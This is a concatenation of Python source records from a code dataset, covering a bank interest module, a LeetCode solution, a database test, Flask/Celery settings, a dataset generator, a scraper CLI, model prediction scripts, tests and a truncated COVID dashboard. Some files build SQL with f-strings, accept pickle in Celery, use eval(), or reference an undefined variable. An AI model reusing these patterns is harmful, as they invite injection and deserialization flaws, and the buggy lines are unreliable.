ef.ledger_update(\"Bank_Withdrawal\", guild_id,\n \"\\\"Bank\\\"\", user.id, amount)\n ef.money_transfer(user.id, amount)\n ef.money_transfer(\"\\\"Bank\\\"\", -amount)\n return f\"{user.name} has withdrawn {amount:.2f} dollars.\"\n\n\ndef handle_interest():\n with open(\"date.txt\", \"r\") as f:\n current_day = datetime.datetime.strptime(f.readline(),\n '%m/%d/%Y').date()\n if (datetime.date.today() != current_day):\n d = (datetime.date.today() - current_day).days\n print(f\"Paying interest for {d} days\")\n db = sqlite3.connect('main.sqlite')\n cursor = db.cursor()\n cursor.execute(f'UPDATE bank_deposits SET dollars = ' \\\n f'dollars * {(1 + DEPOSIT_RATE / 365) ** d}')\n db.commit()\n with open(\"date.txt\", \"w+\") as f:\n f.write(datetime.date.today().strftime('%m/%d/%Y'))\n","sub_path":"bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"555074917","text":"\"\"\"\n当 A 的子数组 A[i], A[i+1], ..., A[j] 满足下列条件时,我们称其为湍流子数组:\n\n若 i <= k < j,当 k 为奇数时, A[k] > A[k+1],且当 k 为偶数时,A[k] < A[k+1];\n或 若 i <= k < j,当 k 为偶数时,A[k] > A[k+1] ,且当 k 为奇数时, A[k] < A[k+1]。\n也就是说,如果比较符号在子数组中的每个相邻元素对之间翻转,则该子数组是湍流子数组。\n\n返回 A 的最大湍流子数组的长度。\n\n \n\n示例 1:\n\n输入:[9,4,2,10,7,8,8,1,9]\n输出:5\n解释:(A[1] > A[2] < A[3] > A[4] < A[5])\n示例 2:\n\n输入:[4,8,12,16]\n输出:2\n示例 3:\n\n输入:[100]\n输出:1\n \n\n提示:\n\n1 <= A.length <= 40000\n0 <= A[i] <= 10^9\n通过次数13,781提交次数32,291\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/longest-turbulent-subarray\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\nfrom typing import *\n\nclass Solution:\n def maxTurbulenceSize(self, arr: List[int]) -> int:\n largeOdd, largeEven, maxLen = 1, 1, 1\n for i in range(1, len(arr)):\n isOdd = (i % 2) == 1\n if arr[i] > arr[i - 1]:\n if isOdd:\n largeOdd += 1\n largeEven = 1\n else:\n largeOdd = 1\n largeEven += 1\n elif arr[i] < arr[i - 1]:\n if isOdd:\n largeOdd = 1\n largeEven += 1\n else:\n largeOdd += 1\n largeEven = 1\n else:\n largeOdd, largeEven = 1, 1\n\n maxLen = max(max(largeOdd, largeEven), maxLen)\n return maxLen","sub_path":"978_maxTurbulenceSizeSubArray.py","file_name":"978_maxTurbulenceSizeSubArray.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"361759375","text":"import pymysql as sql\ndata1=sql.connect(\"localhost\",\"root\",\"\",\"valkyrie\")\ncur=data1.cursor()\nclass test:\n\tdef inser(self):\n\t\tnum=\"55\"\n\t\tname=\"rr\"\n\t\tcur.execute(f\"insert into test values({num},'{name}')\")\n\t\tdata1.commit()\ntt=test()\ntt.inser()","sub_path":"database/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"350213564","text":"from celery.schedules import crontab\nfrom datetime import timedelta\n\n### lumbermill CONFIGURATION ###\n\n# Application general settings\nSERVER_NAME = ''\nDEBUG = True\nSECRET_KEY = ''\nDEVEL_MODE = True\nCACHE_TYPE = 'simple'\n\n# JWT Config\nJWT_AUTH_URL_RULE = '/api/auth'\nJWT_EXPIRATION_DELTA = timedelta(hours=24)\n\n# Redis\nLS_REDIS_URL = \"localhost\"\n\nCORS_HEADERS = 'Origin, Content-Type, Accept, Authorization'\nCORS_RESOURCES = {\n r\"/api/*\": {\n \"origins\": \"*\"\n }\n}\n\nCORS_METHODS = ['GET', 'POST', 'DELETE', 'PUT', 'OPTIONS', 'HEAD']\n\n\n# lumbermill (MongoDB) database\nMONGODB_DB = 'lumbermill'\nMONGODB_HOST = 'localhost'\nMONGODB_PORT = 27017 \n\n# Celery / MQ\nCELERY_BROKER_URL = 'redis://127.0.0.1:6379'\nCELERY_BACKEND_URL = 'redis://127.0.0.1:6379'\nCELERY_ACCEPT_CONTENT = ['pickle', 'json', 'msgpack', 'yaml']\nCELERYD_CONCURRENCY = 4\n\n############################################################\n### Stack process management, configuration & deployment ###\n############################################################\n\n# Lumbermill app controller path (setuid wrapper)\nLM_APPCONTROL_PATH = \"/opt/lumbermill/lumbermill-app-controller\"\n\n# Valid services for process management\nVALID_COMPONENTS = ['logstash-server', 'logstash-indexer', 'redis', 'elasticsearch', 'kibana']\n\n# Logstash\nLS_MAIN_SERVICE_NAME = \"logstash-server\"\n\n\nLS_CONFIG_BANNER = \"\"\"\n\n###\n### DO NOT MODIFY THIS FILE DIRECTLY - YOUR CHANGES WILL BE OVERWRITTEN!\n###\n### Use the following URL to make Logstash configuration changes:\n### https://%s\n###\n\n\"\"\" % SERVER_NAME\n\n# Various Logstash paths\nLS_CONFIG_DIR_PATH = \"/opt/logstash/conf\"\nLS_CONFIG_FILE = \"logstash-server.conf\"\nLS_CONFIG_BACKUP_DIR = \"backups\"\n\n\nLS_BINARY_PATH = \"/opt/logstash/bin/logstash\"\nLS_CONFIGTEST_FLAG = \"--configtest\"\nLS_CONFIGPATH_FLAG = \"--config\"\n\n\n\n\n\n\n\n","sub_path":"lumbermill/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"348631929","text":"import argparse\r\nimport math\r\nimport os\r\nimport random\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom tqdm import tqdm\r\n\r\nfrom model import OPERATIONS, MAX_EXPRESSION_LENGTH, MAX_RESULT_LENGTH,\\\r\n MIN_NUMBER, MAX_NUMBER, MAX_NUMBER_IN_EXPRESSION, VECTOR_SIZE\r\n\r\n\r\nclass _Expression:\r\n OPS = OPERATIONS\r\n GROUP_PROB = 0.3\r\n MIN_NUM, MAX_NUM = MIN_NUMBER, MAX_NUMBER\r\n\r\n def __init__(self, max_numbers):\r\n self._expression = str(random.randint(MIN_NUMBER, MAX_NUMBER))\r\n numbers_count = random.randint(2, max_numbers)\r\n for _ in range(1, numbers_count):\r\n left = self._expression\r\n left = self._maybe_group(left)\r\n right = str(random.randint(MIN_NUMBER, MAX_NUMBER))\r\n right = self._maybe_group(right)\r\n # always group negatives on the right side\r\n if random.random() < 0.5:\r\n left, right = right, left\r\n if right.startswith('-'):\r\n right = '({})'.format(right)\r\n op = random.choice(self.OPS)\r\n self._expression = \"{0}{1}{2}\".format(left, op, right)\r\n\r\n def _maybe_group(self, expression):\r\n if (random.random() < self.GROUP_PROB):\r\n return '({})'.format(expression)\r\n else:\r\n return expression\r\n\r\n def __str__(self):\r\n return self._expression\r\n\r\n\r\ndef generate_expression():\r\n return str(_Expression(MAX_NUMBER_IN_EXPRESSION))\r\n\r\n\r\ndef train_test_generator(samples_count):\r\n for _ in(range(samples_count)):\r\n expression = generate_expression()\r\n while len(expression) > MAX_EXPRESSION_LENGTH:\r\n expression = generate_expression()\r\n\r\n result = str(eval(expression))\r\n yield expression, result\r\n\r\n\r\ndef get_args():\r\n parser = argparse.ArgumentParser(\r\n description='Generates dataset for training')\r\n\r\n parser.add_argument('-c', '--count',\r\n type=int,\r\n dest='samples_count',\r\n required=True,\r\n help='Count of (expression, result) pairs to generate')\r\n parser.add_argument('-o', '--output_path',\r\n dest='output_path',\r\n required=True,\r\n help='Path to save the dataset')\r\n parser.add_argument('-s', '--seed',\r\n type=int,\r\n dest='seed',\r\n help='Random seed')\r\n return parser.parse_args()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n args = get_args()\r\n out_path = os.path.abspath(args.output_path)\r\n parent_dir = os.path.dirname(out_path)\r\n if not os.path.exists(parent_dir):\r\n os.makedirs(parent_dir)\r\n\r\n if args.seed is not None:\r\n random.seed(args.seed)\r\n X, Y = zip(*tqdm(train_test_generator(args.samples_count),\r\n total=args.samples_count))\r\n data = {'X': X, 'Y': Y}\r\n dataframe = pd.DataFrame(data)\r\n\r\n print('Saving to {}'.format(out_path))\r\n dataframe.to_hdf(out_path, key='train_data',\r\n mode='w', format='fixed')\r\n","sub_path":"generate_dataset.py","file_name":"generate_dataset.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"130210867","text":"### Example 8-14: Printing information for a range of proteins\n\nimport sys\nimport xml.etree.cElementTree as ETree\n\nfrom ch08_12 import print_subtree\n\ndef describe_proteins(tree, limit=2, start=1):\n # start at 1 because 0 is the whole genome!\n iter = tree.getiterator('Seq-entry')\n # +1 to always skip entry for entire genome\n for n in range(start+1):\n next(iter)\n for k in range(limit+1):\n print('{:4}'.format(k+start))\n print_subtree(next(iter), 6)\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n filename = '../data/Acidobacterium-capsulatum-sequences.xml'\n else:\n filename = sys.argv[1]\n tree = ETree.parse(filename)\n descrs = root.getiterator('Seqdesc_source')\n print()\n describe_proteins(tree)\n","sub_path":"chapter_examples/ch08_14.py","file_name":"ch08_14.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"431212039","text":"# builtin\nimport sys\nimport argparse\nimport logging\n\n# internal\nfrom gscrape import utils\nfrom gscrape.session import EndNoteSession\nfrom gscrape.query import GoogleScholarQuery\nfrom gscrape.download import EndNoteDownloader\n\n# Lazy-loaded logger\nLOG = logging.getLogger(__name__)\n\n# Offset step for search results.\nOFFSET_STEP = 10\n\n\ndef init_session():\n LOG.info(\"Initializing HTTP session with Google Scholar...\")\n return EndNoteSession()\n\n\ndef init_logging(level=logging.INFO):\n fmt = '[%(levelname)s] [%(asctime)s] %(message)s'\n logging.basicConfig(level=level, format=fmt)\n\n\ndef search(term, options, session):\n \"\"\"Perform a Google Scholar search and download the results.\n \"\"\"\n total = 0 # number of articles downloaded\n offset = 0 # search offset.\n\n LOG.info(\"Initializing Google Scholar query handler...\")\n query = GoogleScholarQuery(session)\n\n LOG.info(\"Initializing EndNote downloader...\")\n downloader = EndNoteDownloader(session)\n\n while (offset // OFFSET_STEP) < options.limit:\n LOG.debug(\"Searching for '%s' @ offset %d\", term, offset)\n\n # Run the query\n result = query(term, year_from=options.start, offset=offset)\n\n # Sleep before attempting to download anything\n utils.randsleep()\n\n # Download the links embedded in the search results.\n num = downloader.download(result, outdir=options.outdir)\n\n if not num:\n break\n\n LOG.debug(\"Downloaded %d articles for term '%s'.\", num, term)\n\n total += num\n offset += OFFSET_STEP\n\n LOG.info(\"Downloaded %d articles for term '%s'\", total, term)\n\n\ndef _get_parser():\n parser = argparse.ArgumentParser(description=\"Google Scholar Scraper\")\n\n parser.add_argument(\n \"terms\",\n metavar='TERM',\n type=str,\n nargs=\"+\",\n help=\"Search terms.\",\n )\n\n parser.add_argument(\n \"--limit\",\n type=int,\n default=sys.maxint,\n help=(\"The upper limit on the number of result pages to download per \"\n \"search term.\")\n )\n\n parser.add_argument(\n \"--from-year\",\n dest=\"start\",\n type=int,\n default=\"1000\",\n help=\"Only download links from this year forward.\"\n )\n\n parser.add_argument(\n \"--dir\",\n dest=\"outdir\",\n default=\".\",\n help=\"Download directory.\"\n )\n\n parser.add_argument(\n \"--log-level\",\n default=\"INFO\",\n choices=[\"DEBUG\", \"INFO\", \"WARN\", \"ERROR\"],\n help=\"The logging output level.\",\n )\n\n return parser\n\ndef main():\n # Parse comment-line arguments\n parser = _get_parser()\n args = parser.parse_args()\n\n try:\n # initialize the logging\n init_logging(args.log_level)\n\n # initialize the google scholar session\n session = init_session()\n\n # Do the search\n for term in args.terms:\n search(term, args, session)\n\n except Exception as ex:\n LOG.error(str(ex))\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"scripts/run-gscrape.py","file_name":"run-gscrape.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"393433585","text":"# _*_ coding: utf-8 _*_\n# @author: anniequ\n# @file: test.py\n# @time: 2020/11/17 15:02\n# @Software: PyCharm\n\nimport matplotlib.pyplot as plt\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nfrom PIL import Image\nimport numpy as np\nimport torchvision.models as models\nimport torch\n\nfrom datapre import VOCSegDataset, crop, classes\nfrom resunet import resnet34\n\nheight = 224\nwidth = 224\n\nvoc_test = VOCSegDataset(False, height, width)\n\n\nvalid_data = DataLoader(voc_test, batch_size=8)\n\nPATH = r\"./model/weights-33.pth\"\n# 各种标签所对应的颜色\nCOLORMAP = [[0, 0, 0], [1, 0, 128], [0, 128, 1], [0, 128, 129], [128, 0, 0]]\ncm = np.array(COLORMAP).astype('uint8')\n\n\ndef predict(img1, label):\n img1 = Variable(img1.unsqueeze(0)).cuda()\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n net = resnet34(3,5).to(device)\n\n net.load_state_dict(torch.load(PATH))\n out = net(img1)\n pred = out.max(1)[1].squeeze().cpu().data.numpy()\n pred = cm[pred]\n\n pred = Image.fromarray(pred)\n label1 = cm[label.numpy()]\n return pred, label1\n\n\nSIZE = 224\nNUM_IMG = 20\n# _, figs = plt.subplots(NUM_IMG, 3, figsize=(12, 22))\nfor i in range(51):\n img_data, img_label = voc_test[i]\n pred, label = predict(img_data, img_label)\n img_data = Image.open(voc_test.data_list[i])\n img_label = Image.open(voc_test.label_list[i])\n img_data, img_label = crop(img_data, img_label, SIZE, SIZE)\n pred.save(\"./pred/\"+str(i)+\"_pred.png\",'PNG')\n img_data.save(\"./pred/\"+str(i)+\"_img.png\",'PNG')\n print(\"the picture {} has predicted.\".format(i))\n\nprint(\"saving predict results finish.\")\n","sub_path":"t.py","file_name":"t.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"199712576","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport pytest\nimport mongoengine\nfrom sfm.mongoengine_mate import ExtendedDocument\n\n\nclass User(ExtendedDocument):\n id = mongoengine.IntField(primary_key=True)\n name = mongoengine.StringField()\n\n\ndef test_keys_values_items():\n user = User(id=1, name=\"Jack\")\n\n assert user.keys() == [\"id\", \"name\"]\n assert user.values() == [1, \"Jack\"]\n assert user.items() == [(\"id\", 1), (\"name\", \"Jack\")]\n\n\ndef test_to_tuple_list_dict_OrderedDict_json():\n user = User(id=1, name=\"Jack\")\n\n assert user.to_tuple() == (\"id\", \"name\")\n assert user.to_list() == [\"id\", \"name\"]\n assert user.to_dict() == {\"id\": 1, \"name\": \"Jack\"}\n assert user.to_OrderedDict() == {\"id\": 1, \"name\": \"Jack\"}\n\n assert user.to_json() == '{\"_id\": 1, \"name\": \"Jack\"}'\n\n\ndef test_absorb_and_revise():\n user = User(id=1, name=\"Jack\")\n user.absorb(User(name=\"Tom\"))\n assert user.name == \"Tom\"\n\n user_data = {\"name\": \"Mike\"}\n user.revise(user_data)\n assert user.name == \"Mike\"\n\n\nif __name__ == \"__main__\":\n import os\n pytest.main([os.path.basename(__file__), \"--tb=native\", \"-s\", ])\n","sub_path":"tests/test_mongoengine_mate.py","file_name":"test_mongoengine_mate.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"52925077","text":"from nltk.corpus import stopwords\r\nimport pandas as pd\r\nfrom pandas import DataFrame\r\nimport pprint as pp\r\nfrom collections import OrderedDict\r\nfrom nltk import sent_tokenize, word_tokenize, PorterStemmer, WordNetLemmatizer\r\nimport numpy as np\r\nimport math as m\r\nimport operator\r\n\r\n\r\n\r\ndef readData(fileName):\r\n\r\n data = pd.read_excel(fileName)\r\n #data = pd.read_csv(fileName)\r\n\r\n #print(data)\r\n #print(data.shape)\r\n rows = data.shape[0]\r\n columns = data.shape[1]\r\n print(data.shape)\r\n #print(sent_tokenize(data[\"Text\"][1]))\r\n #print(word_tokenize(sent_tokenize(data[\"Text\"][1])[2]))\r\n return data, rows, columns\r\n\r\ndef checkKeys(keySet1, keySet2):\r\n\r\n for key in keySet1:\r\n if key not in keySet2:\r\n return False\r\n\r\n return True\r\n\r\ndef combineDicts(dict1, dict2):\r\n\r\n combinedDict = dict()\r\n\r\n if checkKeys(dict1, dict2):\r\n for k in dict1.keys():\r\n combinedDict[k] = (dict1[k], len(dict2[k]), dict2[k]) #()\r\n else:\r\n return -1\r\n return combinedDict\r\n\r\ndef tokenizer(data: DataFrame, rows, columns):\r\n tokenDict = dict() #\"\": (tf(overall), df, [list of docs it appears in])\r\n tokenDocs = dict()\r\n tokPostings = dict() #\"\": {docid: [tf in that doc, max_tf, doclen], ...}\r\n docInfo = dict()\r\n lematizer = WordNetLemmatizer()\r\n stopWords = set(stopwords.words(\"english\"))\r\n\r\n for i in range(0, rows):\r\n tf = 1\r\n max_tf = 1\r\n doclen = 0\r\n docNo = i\r\n tokens1 = word_tokenize(data[\"Title\"][i])\r\n tokens = list()\r\n #print(data[\"Text\"][i])\r\n sentenceList = sent_tokenize(data[\"Text\"][i])\r\n for sentence in sentenceList:\r\n tmp = word_tokenize(sentence)\r\n for t in tmp:\r\n tokens.append(t)\r\n\r\n #tokens = word_tokenize(sent_tokenize(data[\"Text\"]))\r\n\r\n for t in tokens1:\r\n tokens.append(t)\r\n\r\n for tok in tokens:\r\n doclen += 1\r\n if tok in stopWords:\r\n continue\r\n word = lematizer.lemmatize(tok)\r\n if word in tokenDict:\r\n tokenDict[word] = tokenDict.get(word) + 1\r\n tokenDocs[word].add(docNo)\r\n # tokPostings[word].\r\n else:\r\n tokenDict[word] = 1\r\n tokenDocs[word] = {docNo}\r\n # tokPostings[word] = {docNo:1}\r\n if word in tokPostings:\r\n if docNo in tokPostings[word].keys():\r\n tokPostings[word][docNo][0] = tokPostings[word][docNo][0] + 1\r\n tf = tokPostings[word][docNo][0]\r\n if tf > max_tf:\r\n max_tf = tf\r\n else:\r\n tokPostings[word][docNo] = [1, 0, 0]\r\n else:\r\n tokPostings[word] = {docNo: [1, 0, 0]} # {docid: (tf,max_tf, doclen)}\r\n\r\n docInfo[docNo] = [max_tf, doclen]\r\n for word in tokPostings.keys():\r\n for doc in tokPostings[word]:\r\n tokPostings[word][int(doc)][1] = docInfo[int(doc)][0]\r\n tokPostings[word][int(doc)][2] = docInfo[int(doc)][1]\r\n sumOfDoclens = 0\r\n for doc in docInfo:\r\n sumOfDoclens += docInfo[doc][1]\r\n avgDoclen = sumOfDoclens / rows\r\n fullTokenDict = combineDicts(tokenDict, tokenDocs) # combine dictionaries with same key set\r\n\r\n\r\n if fullTokenDict == -1:\r\n print(\"Failed in combining dictionaries\")\r\n return\r\n # else:\r\n # print(fullTokenDict)\r\n # print(tokenDict)\r\n # stemmedTokenDict, stemmedTokenDocs = stemmer(tokenDict)\r\n return fullTokenDict, tokPostings, avgDoclen\r\n\r\ndef getDocVector(queryVector, docNo, tokDict: dict, tokPostings: dict):\r\n docVector = dict() # {}\r\n for word in queryVector:\r\n if word in tokDict.keys():\r\n if docNo in tokDict[word][2]:\r\n tmp = list() #(df, tf, max_tf, doclen)\r\n tmp.append(tokDict[word][1])\r\n tmp.append(tokPostings[word][docNo][0])\r\n tmp.append(tokPostings[word][docNo][1])\r\n tmp.append(tokPostings[word][docNo][2])\r\n docVector[word] = tmp.copy()\r\n\r\n\r\n\r\n return docVector\r\n\r\ndef calcScore(docVector: dict, queryVector: list, collectionSize):\r\n W1 = np.zeros(len(queryVector))\r\n\r\n Q1 = np.zeros(len(queryVector))\r\n lemmatizer = WordNetLemmatizer()\r\n\r\n similarKeys = list()\r\n query_info = dict() #({word: [tf] })\r\n\r\n for q in queryVector:\r\n if q in query_info:\r\n query_info[q] = query_info.get(q) + 1\r\n else:\r\n query_info[q] = 1\r\n q_maxtf = max(query_info.values())\r\n for q in queryVector:\r\n if q in docVector:\r\n similarKeys.append(q)\r\n for word in similarKeys:\r\n lemma = lemmatizer.lemmatize(word)\r\n tf = float(docVector[lemma][1])\r\n q_tf = float(query_info[lemma])\r\n df_t = float(docVector[lemma][0])\r\n q_df_t = float(query_info[lemma])\r\n maxtf = float(docVector[lemma][2])\r\n index = queryVector.index(lemma)\r\n doclen = float(docVector[lemma][3])\r\n\r\n tf_t_d = 1 + m.log10(tf)\r\n q_tf_t_d = 1 + m.log10(q_tf)\r\n\r\n idf_t = m.log10(collectionSize/(df_t+1))\r\n q_idf_t = m.log10(collectionSize/(q_df_t+1))\r\n\r\n tf_idf = tf_t_d * idf_t\r\n q_tf_idf = q_tf_t_d * q_idf_t\r\n # ###\r\n # [0.4 + 0.6 * log(tf + 0.5) / log(maxtf + 1.0)]\r\n # *[log(collectionsize / df) / log(collectionsize)]\r\n # ###\r\n #w_val1 = (0.4 + 0.6*m.log10(tf + 0.5)/m.log10(maxtf + 1.0)) * (m.log10(collectionSize/df))/m.log10(collectionSize)\r\n w_val1 = tf_idf\r\n q_val1 = q_tf_idf\r\n #q_val1 = (0.4 + 0.6*m.log10(q_tf + 0.5)/m.log10(q_maxtf + 1.0)) * (m.log10(collectionSize/df)/m.log10(collectionSize))\r\n W1[index] = w_val1\r\n Q1[index] = q_val1\r\n\r\n norm_W1 = W1 / np.linalg.norm(W1)\r\n norm_Q1 = Q1 / np.linalg.norm(Q1)\r\n score1 = np.dot(norm_Q1, norm_W1)\r\n\r\n\r\n return score1, norm_W1, norm_Q1\r\n\r\ndef printInfo(fileName, all_vectors1: list, info_vectors1: dict):\r\n file = open(fileName, 'w', encoding=\"utf-8\")\r\n matrix = list()\r\n counter = 0\r\n for item in reversed(all_vectors1):\r\n tmp = list()\r\n\r\n counter += 1\r\n tmp.append(counter)\r\n tmp.append(item[0])\r\n tmp.append(info_vectors1[item[0]][2])\r\n tmp.append(info_vectors1[item[0]][3])\r\n tmp.append(item[1])\r\n tmp.append(info_vectors1[item[0]][0])\r\n tmp.append(info_vectors1[item[0]][1])\r\n\r\n matrix.append(tmp)\r\n\r\n file.write(\"Rank:{}\\nDoc:{}\\nTitle:{}\\nLink:{}\\nScore:{}\\nQueryVec:{}\\nDocVec{}\\n\".format(counter,\r\n item[0],\r\n info_vectors1[item[0]][2],\r\n info_vectors1[item[0]][3],\r\n item[1],\r\n info_vectors1[item[0]][0],\r\n info_vectors1[item[0]][1]))\r\n file.write(\"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\\n\")\r\n\r\n matrix = np.asmatrix(matrix)\r\n return matrix\r\n\r\n\r\ndef vector_space_model(query, tokDict, tokPostings, collectionSize, data: DataFrame):\r\n stopWords = set(stopwords.words(\"english\"))\r\n lematizer = WordNetLemmatizer()\r\n sorted_all_vectors1 = dict()\r\n queryVector = list()\r\n all_vectors1 = OrderedDict()\r\n info_vectors1 = dict()\r\n\r\n\r\n q = word_tokenize(query)\r\n for word in stopWords:\r\n if word in q:\r\n q.remove(word)\r\n for w in q:\r\n queryVector.append(lematizer.lemmatize(w))\r\n #print(queryVector)\r\n for doc in range(0, collectionSize): #docNoRange = no rows\r\n docVector = getDocVector(queryVector, doc, tokDict, tokPostings)\r\n if len(docVector) == 0:\r\n continue\r\n score1, w1, q1 = calcScore(docVector, queryVector, collectionSize)\r\n all_vectors1[doc] = score1\r\n info_vectors1[doc] = (q1, w1, data[\"Title\"][doc], data[\"Link\"][doc])\r\n sorted1 = sorted(all_vectors1.items(), key=operator.itemgetter(1))\r\n\r\n fname1 = \"query_results.txt\"\r\n matrix = printInfo(fname1, sorted1, info_vectors1)\r\n return matrix\r\n\r\n# data, rows, columns = readData(\"crawled_data.xlsx\")\r\n\r\n# tokenDict, tokPostings, avgDoclen = tokenizer(data, rows, columns)\r\n# outFile1 = open(\"tokDict.txt\", 'w', encoding='utf-8')\r\n# outFile2 = open(\"tokPostings.txt\", 'w', encoding='utf-8')\r\n# pp.pprint(tokenDict, stream=outFile1)\r\n# pp.pprint(tokPostings, stream=outFile2)\r\n# vector_space_model(\"Just across the Potomac river from our nation's capital sits Arlington, Virginia, a beautiful city filled with bustling businesses, thriving tech startups, and an innovative vibe that is drawing founders to this growing region\",tokenDict, tokPostings,rows, data)\r\n\r\n","sub_path":"index/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":9301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"506527572","text":"class Solution:\n # @param A : list of list of integers\n # @return an integer\n def minPathSum(self, A):\n y = len(A)\n x = len(A[0])\n\n j = 0\n for i in range(1, x):\n A[j][i] = A[j][i-1] + A[j][i]\n\n j = 0\n for i in range(1, y):\n A[i][j] = A[i-1][j] + A[i][j]\n\n for i in range(1, y):\n for j in range(1, x):\n A[i][j] = min(A[i-1][j] + A[i][j], A[i][j-1] + A[i][j])\n\n return A[-1][-1]\n\n def solve(self, matrix):\n ans = self.minPathSum(matrix)\n print(f'iterative ans is {ans}')\n\n\n\n# if __name__ == '__main__':\n# a = [[1, 3, 2],\n# [4, 3, 1],\n# [5, 6, 1]]\n\n# obj = Solution()\n# ans = obj.minPathSum(a)\n# print(f'ans is {ans}')\n","sub_path":"scaler/dp2/dp2/min_sum_path_in_matrix.py","file_name":"min_sum_path_in_matrix.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"185891971","text":"# devuelve true si la cadena enviada como argumento es palindromo\n\ndef validarPalindromo(str):\n is_palindromo = True\n str = str.lower()\n reverse_str = str[::-1]\n print(f'Comparando: {str} con {reverse_str}')\n\n for idx, char in enumerate(str):\n if(char is not reverse_str[idx]):\n is_palindromo = False\n\n print(f'La cadena: {str} es palindromo? R/ {is_palindromo}')\n return is_palindromo\n\n\nvalidarPalindromo('abc123321cba')\nvalidarPalindromo('Carlos')\nvalidarPalindromo('123321')\nvalidarPalindromo('123456')\n\n\n","sub_path":"practica_02_palindromo/palindromo.py","file_name":"palindromo.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"474908855","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom pandas import DataFrame\nimport seaborn as sns\nimport json\nimport requests\nimport os.path\nimport lxml\nfrom matplotlib.ticker import AutoMinorLocator\nimport csv\nfrom pandas.io.json import json_normalize\nimport math\nfrom bokeh.io import show, output_file\nfrom bokeh.models import ColumnDataSource, Legend, LegendItem, Scatter, Label\nfrom bokeh.plotting import figure, output_file, show, output_notebook, curdoc\nfrom bokeh.models.tools import HoverTool\nfrom bokeh.core.properties import value\nfrom bokeh.palettes import Spectral11\nimport itertools\nfrom bokeh.layouts import row, column\nfrom bokeh.models.annotations import Title\nfrom bokeh.models import Panel, Tabs\nfrom datetime import timedelta\nfrom bokeh.models import LinearAxis, Range1d\nfrom bokeh.models import Div\n\n\nbokeh_doc=curdoc()\n\ncases_summary = requests.get('https://api.rootnet.in/covid19-in/stats/history')\n\njson_data = cases_summary.json()\ncases_summary=pd.json_normalize(json_data['data'], record_path='regional', meta='day')\n\ncases_summary['loc']=np.where(cases_summary['loc']=='Nagaland#', 'Nagaland', cases_summary['loc'])\n\nlatest_date=cases_summary['day'].max()\nhighest_state=cases_summary[cases_summary['totalConfirmed']==cases_summary['totalConfirmed'].max()]['loc'].tolist()[0]\n\nlegend_it=[]\n\np = figure(plot_width=1200, plot_height=600, x_axis_type=\"datetime\", sizing_mode=\"scale_both\")\np.title.text='Statewise Cases over Time'\np.title.align='center'\np.title.text_font_size='17px'\np.xaxis.axis_label = 'Date'\np.yaxis.axis_label = 'Number of Cases'\n\n\nfor name, color in zip(cases_summary['loc'].unique(), itertools.cycle(Spectral11)):\n cases_summary['day'] = pd.to_datetime(cases_summary['day'])\n renderer=p.line(cases_summary[cases_summary['loc']==name]['day'], cases_summary[cases_summary['loc']==name]['totalConfirmed'], line_width=2, color=color, alpha=1,\n muted_alpha=0.2)\n\n renderer.visible = False\n\n legend_it.append((name, [renderer]))\n\nlegend1=Legend(items=legend_it[0:16], location=(10,0), click_policy='hide', title=\"Click on States to Switch ON/OFF\", title_text_font_style = \"bold\")\nlegend2=Legend(items=legend_it[17:33], location=(10,0), click_policy='hide', title=\"Click on States to Switch ON/OFF\", title_text_font_style = \"bold\")\n\np.add_layout(legend1,'right')\np.add_layout(legend2,'right')\n\ncases_summary['day']=cases_summary['day'].astype('str')\nsource=ColumnDataSource(cases_summary)\n\nhover = HoverTool(line_policy='next')\nhover.tooltips = [('Date', '@x{%F}'),\n ('Cases', '@y{0000}') # @$name gives the value corresponding to the legend\n]\nhover.formatters = {'@x': 'datetime'}\np.add_tools(hover)\n\ncitation = Label(x=0, y=0, x_units='screen', y_units='screen',\n text='Last Updated : {}'.format(latest_date), render_mode='css', text_font_size='12px')\np.add_layout(citation, 'above')\n\ndiv = Div(text=\"\"\"Source:\n COVID-19 REST API for India: The Ministry of Health and Family Welfare \"\"\",\nwidth=300, height=50, align='start')\n\nfig = column(p,div, sizing_mode='scale_both')\ntab1 = Panel(child=fig, title=\"All Cases - Statewise\")\n\n#statewise death count over time\n\nlegend_it=[]\n\nq = figure(plot_width=1200, plot_height=600, 